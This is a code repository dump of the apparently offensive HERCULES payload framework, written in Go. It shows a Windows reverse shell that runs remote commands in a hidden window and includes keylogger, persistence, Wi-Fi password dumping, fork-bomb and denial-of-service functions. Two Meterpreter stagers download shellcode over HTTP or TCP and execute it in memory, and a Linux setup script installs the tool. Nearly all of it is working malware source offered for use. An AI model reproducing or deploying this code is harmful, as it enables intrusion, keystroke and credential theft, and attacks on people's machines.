nil { 825 | Payload.Port = PORT 826 | break 827 | } 828 | Warning.Println("\n\n[!] ERROR : Invalid port") 829 | 830 | } 831 | 832 | 833 | 834 | }else { 835 | 836 | ClearScreen() 837 | PrintBanner() 838 | PrintPayloads() 839 | 840 | Warning.Println("\n[!] ERROR : Invalid choise\n") 841 | 842 | fmt.Print("\n\n[*] Select : ") 843 | fmt.Scan(&NO) 844 | 845 | PreparePayload(NO) 846 | 847 | } 848 | 849 | } 850 | -------------------------------------------------------------------------------- /SOURCE/Payloads/HERCULES REVERSE SHELL.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "net" 4 | import "os/exec" 5 | import "bufio" 6 | import "strings" 7 | import "syscall" 8 | import "time" 9 | import "EGESPLOIT" 10 | 11 | 12 | 13 | const IP string = "10.10.10.84" 14 | const PORT string = "5555" 15 | 16 | const BACKDOOR bool = false; 17 | const EMBEDDED bool = false; 18 | const TIME_DELAY time.Duration = 5;//Second 19 | 20 | const B64_BINARY string = "//INSERT-BINARY-HERE//" 21 | const BINARY_NAME string = "winupdt.exe" 22 | 23 | var GLOBAL_COMMAND string; 24 | var PARAMETERS string; 25 | var KeyLogs string; 26 | 27 | 28 | 29 | func main() { 30 | 31 | 32 | if EMBEDDED == true { 33 | EGESPLOIT.Dispatch(B64_BINARY, BINARY_NAME, PARAMETERS) 34 | } 35 | 36 | 37 | if BACKDOOR == true { 38 | EGESPLOIT.Persistence() 39 | } 40 | 41 | connect, err := net.Dial("tcp", IP+":"+PORT); 42 | if err != nil { 43 | time.Sleep(TIME_DELAY*time.Second); 44 | main(); 45 | }; 46 | 47 | 48 | 49 | Dir, Version, Username, AV := EGESPLOIT.Sysguide() 50 | SysGuide := (BANNER + "# SYSGUIDE\n" + "|" + string(Version) + "|\n|\n~> User : " + string(Username) + "\n|\n|\n~> AV : " + string(AV) + "\n\n\n" + string(Dir) + ">") 51 | connect.Write([]byte(string(SysGuide))); 52 | 53 | 54 | 55 | for { 56 | 57 | Command, _ := bufio.NewReader(connect).ReadString('\n'); 58 | _Command := string(Command); 59 | GLOBAL_COMMAND = _Command; 60 | 61 | 62 | 63 | if strings.Contains(_Command, "~please") || strings.Contains(_Command, "~PLEASE") { 64 | connect.Write([]byte(EGESPLOIT.Please(GLOBAL_COMMAND))); 65 | }else if strings.Contains(_Command, "~METERPRETER") || strings.Contains(_Command, "~meterpreter") { 66 | Temp_Address := strings.Split(_Command, "\"")//~meterpreter --tcp "127.0.0.1:4444" 67 | Address := string(Temp_Address[1]) 68 | ConType := strings.Split(_Command, " ") 69 | ConType[1] = strings.TrimPrefix(ConType[1], "--") 70 | EGESPLOIT.Meterpreter(ConType[1], Address) 71 | connect.Write([]byte("\n\n[+] Meterpreter Executed !\n\n"+Dir+">")); 72 | }else if strings.Contains(_Command, "~MIGRATE") || strings.Contains(_Command, "~migrate") { 73 | Temp_Address := strings.Split(_Command, "\"")//~migrate "127.0.0.1:4444" 1212 74 | Address := string(Temp_Address[1]) 75 | Pid := strings.Split(_Command, " ") 76 | Result, Error := EGESPLOIT.Migrate(Pid[2], Address) 77 | if Result == true { 78 | connect.Write([]byte("\n\n[+] Succesfully Migrated !\n\n"+Dir+">")); 79 | }else{ 80 | connect.Write([]byte("\n\n"+Error+"\n\n"+Dir+">")); 81 | } 82 | }else if strings.Contains(_Command, "~DOS") || strings.Contains(_Command, "~dos") { 83 | DOS_Command := strings.Split(GLOBAL_COMMAND, "\"") 84 | var DOS_Target string = DOS_Command[1] 85 | if strings.Contains(string(DOS_Target), "http") { 86 | go EGESPLOIT.Dos(DOS_Target); 87 | connect.Write([]byte("\n\n[*] Starting DOS atack..."+"\n\n[*] Sending 1000 request to "+DOS_Target+" !\n\n"+Dir+">")); 88 | }else{ 89 | connect.Write([]byte("\n\n[-] ERROR: Invalid url !\n\n"+Dir+">")); 90 | } 91 | }else if strings.Contains(_Command, "~DISTRACT") || strings.Contains(_Command, "~distract") { 92 | EGESPLOIT.Distrackt(); 93 | }else if strings.Contains(_Command, "~KEYLOGGER-DEPLOY") || strings.Contains(_Command, "~keylogger-deploy") || strings.Contains(_Command, "~Keylogger-Deploy"){ 94 | go EGESPLOIT.Keylogger(&KeyLogs); 95 | connect.Write([]byte(string("\n[*] Keylogger deploy completed\n" + "\n" + string(Dir) + ">"))); 96 | }else if strings.Contains(_Command, "~KEYLOGGER-DUMP") || strings.Contains(_Command, "~keylogger-dump") || strings.Contains(_Command, "~Keylogger-Dump"){ 97 | Dump_Output := string("################## KEYLOGGER DUMP ##################" + "\n\n" + string(KeyLogs) + "\n####################################################" + "\n"+string(Dir)+">"); 98 | connect.Write([]byte(Dump_Output)); 99 | }else if strings.Contains(_Command, "~WIFI-LIST") || strings.Contains(_Command, "~wifi-list") { 100 | List := EGESPLOIT.WifiList(); 101 | connect.Write([]byte(string(List))); 102 | }else if strings.Contains(_Command, "~HELP") || strings.Contains(_Command, "~help") { 103 | connect.Write([]byte(string(HELP+Dir+">"))); 104 | }else if strings.Contains(_Command, "~PERSISTENCE") || strings.Contains(_Command, "~persistence") { 105 | go EGESPLOIT.Persistence(); 106 | connect.Write([]byte("\n\n[*] Adding persistence registries...\n[*] Persistence Completed\n\n" + string(Dir) +">")); 107 | }else{ 108 | cmd := exec.Command("cmd", "/C", _Command); 109 | cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}; 110 | out, _ := cmd.Output(); 111 | Command_Output := string("\n\n"+string(out)+"\n"+string(Dir)+">"); 112 | connect.Write([]byte(Command_Output)); 113 | }; 114 | }; 115 | }; 116 | 117 | 118 | 119 | 120 | 121 | 122 | var BANNER string = ` 123 | __ ____________ ________ ____ ___________ 124 | / / / / ____/ __ \/ ____/ / / / / / ____/ ___/ 125 | / /_/ / __/ / /_/ / / / / / / / / __/ \__ \ 126 | / __ / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ / 127 | /_/ /_/_____/_/ |_|\____/\____/_____/_____//____/ 128 | 129 | 130 | ############################ HERCULES REVERSE SHELL ############################ 131 | ` 132 | 133 | 134 | 135 | 136 | var HELP string = ` 137 | 138 | __ ____________ ________ ____ ___________ 139 | / / / / ____/ __ \/ ____/ / / / / / ____/ ___/ 140 | / /_/ / __/ / /_/ / / / / / / / / __/ \__ \ 141 | / __ / /___/ _, _/ /___/ /_/ / /___/ /___ ___/ / 142 | /_/ /_/_____/_/ |_|\____/\____/_____/_____//____/ 143 | 144 | 145 | ############################ HERCULES REVERSE SHELL ########################################## 146 | 147 | 148 | 149 | ~PERSSISTENCE Installs a persistence module for continious acces 150 | 151 | ~DISTRACT Executes a fork bomb bat file for distraction 152 | 153 | ~PLEASE Asks users comfirmation for higher privilidge operations 154 | 155 | ~DOS -A "www.targetsite.com" Starts a denial of service atack 156 | 157 | ~WIFI-LIST Dumps all wifi history data with passwords 158 | 159 | ~METERPRETER --http "10.0.0.1:4444" Creates a meterpreter connection to metasploit (http/https/tcp) 160 | 161 | ~KEYLOGGER-DEPLOY Installs a keylogger module and logs all keystrokes 162 | 163 | ~KEYLOGGER-DUMP Dumps all loged keystrokes 164 | 165 | ~MIGRATE "10.0.0.1:4444" 2222 Creates a reverse http meterpreter session at given pid (EXPERIMENTAL) 166 | 167 | 168 | ############################################################################################### 169 | 170 | ` 171 | -------------------------------------------------------------------------------- /SOURCE/Payloads/Meterpreter_Reverse_HTTP_HTTPS.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "net/http" 4 | import "syscall" 5 | import "unsafe" 6 | import "io/ioutil" 7 | //import "EGESPLOIT/RSE" 8 | 9 | 10 | 11 | const MEM_COMMIT = 0x1000 12 | const MEM_RESERVE = 0x2000 13 | const PAGE_AllocateUTE_READWRITE = 0x40 14 | 15 | var K32 = syscall.NewLazyDLL("kernel32.dll") 16 | var VirtualAlloc = K32.NewProc("VirtualAlloc") 17 | var Address string = "http://127.0.0.1:8080/" 18 | var Checksum string = "102011b7txpl71n" 19 | 20 | 21 | 22 | func main() { 23 | //RSE.Persistence() 24 | Address += Checksum 25 | Response, err := http.Get(Address) 26 | if err != nil { 27 | main() 28 | } 29 | Shellcode, _ := ioutil.ReadAll(Response.Body) 30 | 31 | Addr, _, err := VirtualAlloc.Call(0, uintptr(len(Shellcode)), MEM_RESERVE|MEM_COMMIT, PAGE_AllocateUTE_READWRITE) 32 | if Addr == 0 { 33 | main() 34 | } 35 | AddrPtr := (*[990000]byte)(unsafe.Pointer(Addr)) 36 | for i := 0; i < len(Shellcode); i++ { 37 | AddrPtr[i] = Shellcode[i] 38 | } 39 | //RSE.Migrate(Addr, len(Shellcode)) 40 | syscall.Syscall(Addr, 0, 0, 0, 0) 41 | 42 | } 43 | -------------------------------------------------------------------------------- /SOURCE/Payloads/Meterpreter_Reverse_TCP.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | 4 | import "encoding/binary" 5 | import "syscall" 6 | import "unsafe" 7 | //import "EGESPLOIT/RSE" 8 | 9 | const MEM_COMMIT = 0x1000 10 | const MEM_RESERVE = 0x2000 11 | const PAGE_AllocateUTE_READWRITE = 0x40 12 | 13 | 14 | var K32 = syscall.NewLazyDLL("kernel32.dll") 15 | var VirtualAlloc = K32.NewProc("VirtualAlloc") 16 | 17 | 18 | func Allocate(Shellcode uintptr) (uintptr) { 19 | 20 | Addr, _, _ := VirtualAlloc.Call(0, Shellcode, MEM_RESERVE|MEM_COMMIT, PAGE_AllocateUTE_READWRITE) 21 | if Addr == 0 { 22 | main() 23 | } 24 | return Addr 25 | } 26 | 27 | func main() { 28 | //RSE.Persistence() 29 | var WSA_Data syscall.WSAData 30 | syscall.WSAStartup(uint32(0x202), &WSA_Data) 31 | Socket, _ := syscall.Socket(syscall.AF_INET, syscall.SOCK_STREAM, 0) 32 | Socket_Addr := syscall.SockaddrInet4{Port: 5555, Addr: [4]byte{127,0,0,1}} 33 | syscall.Connect(Socket, &Socket_Addr) 34 | var Length [4]byte 35 | WSA_Buffer := syscall.WSABuf{Len: uint32(4), Buf: &Length[0]} 36 | UitnZero_1 := uint32(0) 37 | DataReceived := uint32(0) 38 | syscall.WSARecv(Socket, &WSA_Buffer, 1, &DataReceived, &UitnZero_1, nil, nil) 39 | Length_int := binary.LittleEndian.Uint32(Length[:]) 40 | if Length_int < 100 { 41 | main() 42 | } 43 | Shellcode_Buffer := make([]byte, Length_int) 44 | 45 | var Shellcode []byte 46 | WSA_Buffer = syscall.WSABuf{Len: Length_int, Buf: &Shellcode_Buffer[0]} 47 | UitnZero_1 = uint32(0) 48 | DataReceived = uint32(0) 49 | TotalDataReceived := uint32(0) 50 | for TotalDataReceived < Length_int { 51 | syscall.WSARecv(Socket, &WSA_Buffer, 1, &DataReceived, &UitnZero_1, nil, nil) 52 | for i := 0; i < int(DataReceived); i++ { 53 | Shellcode = append(Shellcode, Shellcode_Buffer[i]) 54 | } 55 | TotalDataReceived += DataReceived 56 | } 57 | 58 | Addr := Allocate(uintptr(Length_int + 5)) 59 | AddrPtr := (*[990000]byte)(unsafe.Pointer(Addr)) 60 | SocketPtr := (uintptr)(unsafe.Pointer(Socket)) 61 | AddrPtr[0] = 0xBF 62 | AddrPtr[1] = byte(SocketPtr) 63 | AddrPtr[2] = 0x00 64 | AddrPtr[3] = 0x00 65 | AddrPtr[4] = 0x00 66 | for BpuAKrJxfl, IIngacMaBh := range Shellcode { 67 | AddrPtr[BpuAKrJxfl+5] = IIngacMaBh 68 | } 69 | //RSE.Migrate(Addr, int(Length_int)) 70 | syscall.Syscall(Addr, 0, 0, 0, 0) 71 | } 72 | 73 | /* 74 | 75 | 1. Create WSA DATA version 2.2 76 | 2. Create a WSA Socket 77 | 3. Create WSA Socket Address object 78 | 4. Connect 79 | 5. Create 4 byte second stage length array 80 | 6. Create a WSA Buffer object pointing second stage length array 81 | 7. Receive 4 bytes WSARecv to second stage length array 82 | 8. Convert second stage length to int 83 | 9. Create a byte array at the size of second stage byte array for second stage shellcode 84 | 10. Create a undefined byte array 85 | 11. Create another WSA buffer object pointing at second stage shellcode byte array 86 | 12. Construct a nested for loop that receives bytes and appends them into undefined byte array 87 | 13. Allocate space in memory at the size of (second stage shellcode + 5) 88 | 14. Create a pointer that points to WSA Socket 89 | 15. Assing 0xBF(mov edi) to fist byte of allocated memory 90 | 16. Assing WSA Socket pointer to second byte of allocated memory 91 | 17. Assing tree null bytes after second byte of allocated memory 92 | 18. Move shellcode bytes to allocated memory starting at fift byte 93 | 19. Make a syscall to allocated memory address 94 | */ 95 | -------------------------------------------------------------------------------- /Setup.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import "os/exec" 4 | import "strings" 5 | import "runtime" 6 | import "github.com/fatih/color" 7 | import "os" 8 | 9 | 10 | 11 | 12 | 13 | func main() { 14 | 15 | 16 | 17 | Green := color.New(color.FgGreen) 18 | BoldGreen := Green.Add(color.Bold) 19 | Yellow := color.New(color.FgYellow) 20 | BoldYellow := Yellow.Add(color.Bold) 21 | Red := color.New(color.FgRed) 22 | BoldRed := Red.Add(color.Bold) 23 | White := color.New(color.FgWhite) 24 | BoldWhite := White.Add(color.Bold) 25 | 26 | color.Red(" ██░ ██ ▓█████ ██▀███ ▄████▄ █ ██ ██▓ ▓█████ ██████ ") 27 | color.Red("▓██░ ██▒▓█ ▀ ▓██ ▒ ██▒▒██▀ ▀█ ██ ▓██▒▓██▒ ▓█ ▀ ▒██ ▒ ") 28 | color.Red("▒██▀▀██░▒███ ▓██ ░▄█ ▒▒▓█ ▄ ▓██ ▒██░▒██░ ▒███ ░ ▓██▄ ") 29 | color.Red("░▓█ ░██ ▒▓█ ▄ ▒██▀▀█▄ ▒▓▓▄ ▄██▒▓▓█ ░██░▒██░ ▒▓█ ▄ ▒ ██▒") 30 | color.Red("░▓█▒░██▓░▒████▒░██▓ ▒██▒▒ ▓███▀ ░▒▒█████▓ ░██████▒░▒████▒▒██████▒▒") 31 | color.Red(" ▒ ░░▒░▒░░ ▒░ ░░ ▒▓ ░▒▓░░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ░ ▒░▓ ░░░ ▒░ ░▒ ▒▓▒ ▒ ░") 32 | color.Red(" ▒ ░▒░ ░ ░ ░ ░ ░▒ ░ ▒░ ░ ▒ ░░▒░ ░ ░ ░ ░ ▒ ░ ░ ░ ░░ ░▒ ░ ░") 33 | color.Red(" ░ ░░ ░ ░ ░░ ░ ░ ░░░ ░ ░ ░ ░ ░ ░ ░ ░ ") 34 | color.Red(" ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ") 35 | color.Red(" ░ ") 36 | 37 | color.Green("\n+ -- --=[ HERCULES FRAMEWORK ]") 38 | BoldGreen.Println("+ -- --=[ Ege Balcı ]") 39 | 40 | 41 | 42 | 43 | 44 | Priv := CheckSUDO() 45 | 46 | BoldWhite.Println("\n\n[*] STARTING HERCULES SETUP \n") 47 | 48 | 49 | BoldYellow.Println("[*] Detecting OS...") 50 | 51 | if runtime.GOOS == "linux" { 52 | 53 | 54 | OsVersion, _ := exec.Command("sh", "-c", "uname -a").Output() 55 | BoldYellow.Println("[*] OS Detected : " + string(OsVersion)) 56 | BoldYellow.Println("[*] Setting HERCULES path...") 57 | 58 | 59 | Path, _ := exec.Command("sh", "-c", "pwd").Output() 60 | BoldYellow.Println("[*] HERCULES_PATH="+string(Path)) 61 | _Path := strings.Trim(string(Path), "\n") 62 | var HERCULES_PATH string = string("echo 'export HERCULES_PATH="+_Path+"' >> ~/.bashrc") 63 | exec.Command("sh", "-c", HERCULES_PATH).Run() 64 | exec.Command("sh", "-c", string("export HERCULES_PATH="+string(Path))).Run() 65 | if strings.Contains(string(OsVersion), "Ubuntu") || strings.Contains(string(OsVersion), "kali") { 66 | BoldYellow.Println("[*] Installing golang...") 67 | if Priv == false { 68 | BoldRed.Println("[!] ERROR : Setup needs root privileges") 69 | } 70 | Go := exec.Command("sh", "-c", "sudo apt-get install golang") 71 | Go.Stdout = os.Stdout 72 | Go.Stderr = os.Stderr 73 | Go.Stdin = os.Stdin 74 | Go.Run() 75 | BoldYellow.Println("[*] Installing upx...") 76 | UPX := exec.Command("sh", "-c", "sudo apt-get install upx") 77 | UPX.Stdout = os.Stdout 78 | UPX.Stderr = os.Stderr 79 | UPX.Stdin = os.Stdin 80 | UPX.Run() 81 | BoldYellow.Println("[*] Installing git...") 82 | Git := exec.Command("sh", "-c", "sudo apt-get install git") 83 | Git.Stdout = os.Stdout 84 | Git.Stderr = os.Stderr 85 | Git.Stdin = os.Stdin 86 | Git.Run() 87 | 88 | BoldYellow.Println("[*] Cloning EGESPLOIT Library...") 89 | exec.Command("sh", "-c", "cd src && git clone https://github.com/EgeBalci/EGESPLOIT.git").Run() 90 | exec.Command("sh", "-c", "export GOPATH=$HERCULES_PATH").Run() 91 | BoldYellow.Println("[*] Cloning color Library...") 92 | exec.Command("sh", "-c", "go get github.com/fatih/color").Run() 93 | 94 | exec.Command("sh", "-c", "cd SOURCE && go build HERCULES.go").Run() 95 | 96 | BoldYellow.Println("[*] Createing shoutcut...") 97 | exec.Command("sh", "-c", "sudo cp HERCULES /bin/").Run() 98 | exec.Command("sh", "-c", "sudo chmod 777 /bin/HERCULES").Run() 99 | 100 | }else if strings.Contains(string(OsVersion), "ARCH") || strings.Contains(string(OsVersion), "MANJARO") { 101 | //pacman -S package_name1 102 | BoldYellow.Println("[*] Installing golang...") 103 | BoldYellow.Println("[*] Installing golang...") 104 | if Priv == false { 105 | BoldRed.Println("[!] ERROR : Setup needs root privileges") 106 | } 107 | Go := exec.Command("sh", "-c", "pacman -S go") 108 | Go.Stdout = os.Stdout 109 | Go.Stderr = os.Stderr 110 | Go.Stdin = os.Stdin 111 | Go.Run() 112 | BoldYellow.Println("[*] Installing upx...") 113 | UPX := exec.Command("sh", "-c", "pacman -S upx") 114 | UPX.Stdout = os.Stdout 115 | UPX.Stderr = os.Stderr 116 | UPX.Stdin = os.Stdin 117 | UPX.Run() 118 | BoldYellow.Println("[*] Installing git...") 119 | Git := exec.Command("sh", "-c", "pacman -S git") 120 | Git.Stdout = os.Stdout 121 | Git.Stderr = os.Stderr 122 | Git.Stdin = os.Stdin 123 | Git.Run() 124 | 125 | BoldYellow.Println("[*] Cloning EGESPLOIT Library...") 126 | exec.Command("sh", "-c", "cd SOURCE && git clone https://github.com/EgeBalci/EGESPLOIT.git").Run() 127 | exec.Command("sh", "-c", "export GOPATH=$HERCULES_PATH").Run() 128 | BoldYellow.Println("[*] Cloning color Library...") 129 | exec.Command("sh", "-c", "go get github.com/fatih/color").Run() 130 | 131 | exec.Command("sh", "-c", "cd SOURCE && go build HERCULES.go").Run() 132 | 133 | BoldYellow.Println("[*] Createing shoutcut...") 134 | exec.Command("sh", "-c", "sudo cp HERCULES /bin/").Run() 135 | exec.Command("sh", "-c", "sudo chmod 777 /bin/HERCULES").Run() 136 | 137 | }else{ 138 | BoldRed.Println("[!] ERROR : HERCULES does not support this OS") 139 | } 140 | 141 | 142 | Stat, Err := CheckValid() 143 | 144 | if Stat == false { 145 | BoldYellow.Println("\n") 146 | BoldRed.Println(Err) 147 | }else{ 148 | BoldGreen.Println("\n\n[+] Setup completed successfully") 149 | exec.Command("sh", "-c", "gnome-terminal").Run() 150 | exec.Command("sh", "-c", "exit").Run() 151 | } 152 | 153 | 154 | }else if runtime.GOOS != "linux" { 155 | BoldRed.Println("[!] ERROR : HERCULES only supports linux distributions") 156 | } 157 | 158 | } 159 | 160 | 161 | func CheckValid() (bool, string){ 162 | 163 | OutUPX, _ := exec.Command("sh", "-c", "upx").Output() 164 | if (!strings.Contains(string(OutUPX), "Copyright")) { 165 | return false, "[!] ERROR : upx is not installed" 166 | } 167 | 168 | OutGO, _ := exec.Command("sh", "-c", "go version").Output() 169 | if (!strings.Contains(string(OutGO), "version")) { 170 | return false, "[!] ERROR : golang is not installed" 171 | } 172 | 173 | OutBin, _ := exec.Command("sh", "-c", "cd /bin/ && ls").Output() 174 | if (!strings.Contains(string(OutBin), "HERCULES")) { 175 | return false, "[!] ERROR : Unable to create shoutcut " 176 | } 177 | 178 | return true, "" 179 | 180 | } 181 | 182 | func CheckSUDO() (bool){ 183 | User, _ := exec.Command("sh", "-c", "whoami").Output() 184 | if strings.Contains(string(User), "root") { 185 | return true 186 | }else { 187 | return false 188 | } 189 | 190 | } 191 | --------------------------------------------------------------------------------